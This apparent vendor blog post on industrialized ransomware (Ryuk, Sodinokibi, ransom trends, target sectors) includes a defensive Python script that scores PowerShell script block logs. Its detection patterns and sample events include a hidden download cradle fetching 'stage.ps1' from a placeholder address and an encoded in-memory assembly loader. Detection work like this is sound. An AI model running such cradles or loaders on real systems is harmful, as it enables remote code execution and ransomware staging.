Critical infrastructure attacks and sky-high ransoms are just the beginning

Ransomware isn’t new, but the industrial complex behind today’s biggest attacks certainly is, and ransomware-as-a-service is the latest business model being used to wage war on our infrastructure.

Only a few years ago, ransom demands from cybercriminal gangs were mostly four- or five-figure sums, but those early successes have emboldened today’s cybercriminals to demand millions of dollars, and to get paid.

Ransom amounts have grown alongside the sophistication and scalability of today’s most popular ransomware variants. Cybercrime as a whole is estimated to be a multi-trillion-dollar global industry, and it is growing considerably year over year.

BlackFog collects and analyzes ransomware industry data which enables us to stay ahead of trends and protect our customers from the latest threats. Some of the insights we’ve gathered over the last few months indicate an alarming consolidation of cybercrime resources that will lead to new headline-making attacks in the months to come.

What Does Consolidated Industrialized Cybercrime Look Like?

Most of the data we’ve analyzed throughout the year indicates significant consolidation efforts in the cybercrime world. A handful of highly active ransomware-as-a-service vendors dominate the landscape and provide infrastructural support for a loose confederation of entrepreneurial hackers around the world.

These “ransomware gangs” operate more like corporate managed service providers. They hire specialized developers and group them into separate departments. They have dedicated accounting teams, territory-specific negotiators and executive leaders.

These are not lone-wolf operations, and they haven’t been for a long time.

In fact, major cybercrime vendors are consolidating resources and analyzing their performance to maximize results. More than half of all serialized ransomware attacks use software from two distinct families: Ryuk and Sodinokibi.

  • Ryuk is responsible for a large number of attacks on hospitals and other essential elements of critical infrastructure. Ryuk ransomware was behind last year’s attack on Universal Health Services, which the company estimated cost it $67 million, and the subsequent wave of attacks against US healthcare operators.
  • Sodinokibi is the ransomware operated by the REvil group, and is implicated in many high-cost, high-profile attacks such as the Kaseya supply-chain attack. It is increasingly used in double-extortion attacks, where attackers demand payment both to restore system functionality and to refrain from leaking stolen data to the public.

While these two ransomware families function in entirely different ways, they do share some key similarities. Both rely on abuse of PowerShell (legitimate functionality, not a vulnerability in PowerShell itself) to download payloads remotely and run code in memory, a largely fileless approach that leaves little on disk for antivirus to scan.

BlackFog research shows that 78% of all attacks now abuse PowerShell in this way, rendering file-based detection and prevention methods largely obsolete. A PowerShell payload that never touches disk produces no file hash or signature to match the way file-based ransomware does, so detection has to come from behaviour (script block logging, AMSI and process telemetry) rather than from file scans. More than eight out of every ten attacks also threaten to exfiltrate data, making double extortion possible.
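As an added example (not BlackFog’s code or tooling), the script below shows what behaviour-based detection of this technique looks like in practice: it triages PowerShell script block log entries (Event ID 4104) for the download-cradle, in-memory reflective-load and encoded-command patterns described above. The indicator names, regexes and weights are illustrative assumptions, and the three log entries are constructed, not captured from a real incident. It also handles the edge case that matters most here: a `-EncodedCommand` payload is base64 over UTF-16LE, so the indicators are run against the decoded script rather than the opaque blob.

```python
"""Triage PowerShell script block logs (Event ID 4104) for the in-memory
download-and-execute patterns the article attributes to Ryuk and
Sodinokibi deployments.

Added example, not BlackFog code. Indicator names, regexes and weights are
illustrative assumptions; the sample events are constructed, not captured.
"""
import base64
import re

# (indicator name, pattern, weight). Weights are arbitrary illustrative values.
INDICATORS = [
    ("download_cradle",
     re.compile(r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3),
    ("reflective_load", re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I), 4),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("bypass_policy", re.compile(r"-e(xec(utionpolicy)?|p)\s+bypass", re.I), 2),
    ("amsi_tamper", re.compile(r"amsiInitFailed|AmsiUtils", re.I), 4),
]

# -EncodedCommand (also accepted as -e / -enc): base64 over UTF-16LE text.
ENCODED_CMD = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def expand_encoded_commands(text: str) -> str:
    """Replace each -EncodedCommand blob with the script it decodes to, so the
    indicators match what would actually run rather than opaque base64."""
    def _decode(m):
        try:
            script = base64.b64decode(m.group(3), validate=True).decode("utf-16-le")
        except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
            return m.group(0)  # not a valid encoded command: leave it untouched
        return "-EncodedCommand " + script
    return ENCODED_CMD.sub(_decode, text)


def analyze_script_block(text: str) -> dict:
    """Score one script block: indicators hit, summed weight, and whether an
    encoded command had to be decoded before the indicators became visible."""
    expanded = expand_encoded_commands(text)
    hits = [name for name, rx, _ in INDICATORS if rx.search(expanded)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"indicators": hits, "score": score, "decoded": expanded != text}


def triage(events, threshold: int = 5) -> list:
    """events: iterable of (record_id, script_text). Returns
    (record_id, score, indicators) for blocks at or above threshold, highest first."""
    flagged = []
    for record_id, text in events:
        result = analyze_script_block(text)
        if result["score"] >= threshold:
            flagged.append((record_id, result["score"], result["indicators"]))
    flagged.sort(key=lambda item: item[1], reverse=True)  # stable: ties keep log order
    return flagged


# Constructed sample events (hypothetical record IDs, not real telemetry).
# The third mimics a reflective loader hidden behind -EncodedCommand.
_ENCODED_PAYLOAD = base64.b64encode(
    ("$d=[Convert]::FromBase64String($blob);"
     "[System.Reflection.Assembly]::Load($d).EntryPoint.Invoke($null,$null)").encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    ("4104-0001", r"Get-ChildItem C:\Logs -Filter *.log | Where-Object {$_.Length -gt 1MB} | Remove-Item"),
    ("4104-0002", "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://192.0.2.10/stage.ps1')\""),
    ("4104-0003", f"powershell -ep bypass -e {_ENCODED_PAYLOAD}"),
]

if __name__ == "__main__":
    for record_id, score, indicators in triage(SAMPLE_EVENTS):
        print(f"{record_id}: score={score} indicators={', '.join(indicators)}")
```

The benign housekeeping script scores zero; the download cradle is caught on the raw text; the encoded reflective loader only reveals its `FromBase64String` and `[Reflection.Assembly]::Load` indicators after decoding, which is exactly why a file-hash or plain keyword match misses it. In a real deployment the same logic would run over `Microsoft-Windows-PowerShell/Operational` events with script block logging enabled, and the weights would be tuned against your own baseline of administrative scripts.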

Consolidation Doesn’t Mean Predictability

It might be tempting to think that if major cybercrime organizations are consolidating, they may start using more predictable approaches. Unfortunately, the opposite is more likely. With greater resources and a better-organized executive structure, cybercrime organizations will be able to deliver more diverse and sophisticated ransomware services to their clients.

One of the more interesting developments of the past year supports this theory. The average ransom payment for Q2 2021 was actually lower than in the previous quarter. At $135,576, the average payment was 38% lower than it had been only a few months earlier.

The fundamentals of industrialized cybercrime have not significantly changed during this time, so it’s unlikely that cybercriminals simply decided to be more modest in their financial goals.

The more likely explanation for the drop in average payments is that cybercriminals are testing new capabilities made possible by new technologies and better organization, accepting smaller sums while they refine their approach.

The past few years of ransomware data support this: average ransom demands tend to pull back significantly before rising to new highs. The same thing happened in Q4 2020, when the month of October saw the highest number of ransomware attacks for the entire year. We may see a similar pattern form during the next quarter of this year.

Specialization is Key to Industrialized Ransomware

One of the benefits of industrial consolidation is the ability to better utilize limited resources and capitalize on specialist expertise. Putting top-performers to work on the tasks they do best enables economies of scale that benefit the entire organization.

This is exactly the approach that cybercrime groups have adopted. In our research of ransomware targets by industry, we saw a marked increase in the number of healthcare, technology and finance firms attacked during the last quarter. Government agencies still take the top spot, and the United States still accounts for 50% of all ransomware attacks.

The renewed focus on specific types of organizations speaks to the development of specialized ransomware talent. A particular cybercriminal or team of cybercriminals may spend a great deal of time learning how American healthcare institutions work.

They may experiment – with relatively low ransoms – on a large number of smaller healthcare operators, gauging their capabilities before going after major institutions and demanding seven-figure sums. The experience they gain from each attack gives them insight into how to improve their approach for the next attack.

Security professionals have to recognize what this means. Every cyberattack attempt generates valuable data for cybercriminals whether it’s successful or not. A single institution may find itself targeted by a small, focused team of specialists dedicated to repeated, sustained attacks on that institution specifically.

Next-Generation Cyberattacks Demand Next-Generation Defenses

The proliferation of highly organized cybercrime organizations supporting fileless ransomware attacks puts every organization at risk. There is good reason to believe that a fresh wave of high-profile attacks will dominate headlines in 2022, and most organizations are not equipped to detect or prevent them.

Anti Data Exfiltration (ADX) technology offers protection from known and unknown ransomware attacks by preventing the unauthorized transfer of data outside the network. With no stolen data to leak, the extortion lever behind Sodinokibi-style double-extortion attacks is removed and the attack becomes far less profitable, without impacting everyday usability inside the network.